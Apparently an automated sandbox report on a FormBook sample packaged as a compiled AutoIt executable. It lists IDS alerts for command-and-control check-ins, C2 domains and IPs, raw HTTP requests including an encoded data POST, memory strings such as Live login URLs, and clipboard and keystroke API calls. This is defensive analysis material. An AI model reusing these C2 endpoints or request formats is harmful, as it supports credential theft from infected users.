Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 101.32.205.61:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 101.32.205.61:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 101.32.205.61:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 103.159.36.66:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 103.159.36.66:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 103.159.36.66:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 103.168.172.37:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 103.168.172.37:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 103.168.172.37:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49745 -> 208.91.197.27:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 208.91.197.27:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 208.91.197.27:80
Source: DNS query: www.binjai77rtp11f.xyz
Source: Joe Sandbox View; IP Address: 103.168.172.37
Source: Joe Sandbox View; ASN Name: FORTRESSITXUS
Source: Joe Sandbox View; ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View; ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Users\user\Desktop\ofZiNLLKZU.exe; Code function: 0_2_0064CE44 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic; HTTP traffic detected. All nine GET requests carry the same headers and differ only in request line and Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko

GET /s1oh/?0FJ=D00hHLh&irCxl6=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTT37wm3kse0ebZeD1BOaz6lVPyMDO71Du749G1F/4BLBNXw== HTTP/1.1
Host: www.3nhc3a.top

GET /9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh HTTP/1.1
Host: www.binjai77rtp11f.xyz

GET /wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA== HTTP/1.1
Host: www.vietnamtour.pro

GET /zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh HTTP/1.1
Host: www.showyourstyle.top

GET /gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ== HTTP/1.1
Host: www.rwse6wjx.sbs

GET /nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh HTTP/1.1
Host: www.rokeyfashion.store

GET /up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh HTTP/1.1
Host: www.lucelight.info

GET /kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh HTTP/1.1
Host: www.zrichiod-riech.sbs

GET /3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh HTTP/1.1
Host: www.absseguridad.online
Source: global traffic; DNS traffic detected: DNS query: www.3nhc3a.top
Source: global traffic; DNS traffic detected: DNS query: www.binjai77rtp11f.xyz
Source: global traffic; DNS traffic detected: DNS query: www.vietnamtour.pro
Source: global traffic; DNS traffic detected: DNS query: www.showyourstyle.top
Source: global traffic; DNS traffic detected: DNS query: www.rwse6wjx.sbs
Source: global traffic; DNS traffic detected: DNS query: www.rokeyfashion.store
Source: global traffic; DNS traffic detected: DNS query: www.lucelight.info
Source: global traffic; DNS traffic detected: DNS query: www.zrichiod-riech.sbs
Source: global traffic; DNS traffic detected: DNS query: www.absseguridad.online
Source: global traffic; DNS traffic detected: DNS query: www.daystarcafe.net
                Source: unknownHTTP traffic detected: POST /9fei/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 207Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.binjai77rtp11f.xyzOrigin: http://www.binjai77rtp11f.xyzReferer: http://www.binjai77rtp11f.xyz/9fei/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like GeckoData Raw: 69 72 43 78 6c 36 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 65 69 46 38 62 41 46 41 78 62 49 51 65 6e 59 52 7a 77 5a 6f 74 6e 4c 74 4b 4d 6a 31 65 49 53 48 67 45 4c 4f 49 41 3d Data Ascii: irCxl6=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGeiF8bAFAxbIQenYRzwZotnLtKMj1eISHgELOIA=
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 17:53:57 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 17:55:20 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 17:55:23 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 17:55:25 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 17:55:28 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Fri, 10 Jan 2025 17:55:35 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Fri, 10 Jan 2025 17:55:37 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Fri, 10 Jan 2025 17:55:40 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Fri, 10 Jan 2025 17:55:42 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 17:56:03 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | x-backend: phl-web-01 | X-Frontend: phl-frontend-01 | X-Trace-Id: ti_f42fbc03a3cc6ced93178f8b8bd54dda | Content-Encoding: br
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 17:56:08 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | x-backend: phl-web-01 | X-Frontend: phl-frontend-01 | X-Trace-Id: ti_bc98a39741c8df13dc032603cfc1245b | Content-Encoding: br
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 17:56:11 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 544 | Connection: close | x-backend: phl-web-01 | X-Frontend: phl-frontend-01 | X-Trace-Id: ti_7c6a19c71b3e0f3571897df7b2bf37e6 | Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003F7E000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.000000000370E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.absseguridad.online
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.absseguridad.online/3io6/
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.livechatinc.com/tracking.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: TCPSVCS.EXE, 00000005.00000003.1940163045.000000000738B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Y
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: TCPSVCS.EXE, 00000005.00000002.3901472005.0000000002959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://shorty.bio/zSKcZ7
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000004110000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000038A0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.livechatinc.com/?welcome
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.livechatinc.com/chat-with/13793973/
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0064EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0064EAFF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0064ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0064ED6A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_0063AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0063AA57
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe | Code function: 0_2_00669576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00669576

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: ofZiNLLKZU.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ofZiNLLKZU.exe, 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_76f2b39c-c
                Source: ofZiNLLKZU.exe, 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_83ebe0f4-d
                Source: ofZiNLLKZU.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e1f62201-c
                Source: ofZiNLLKZU.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt 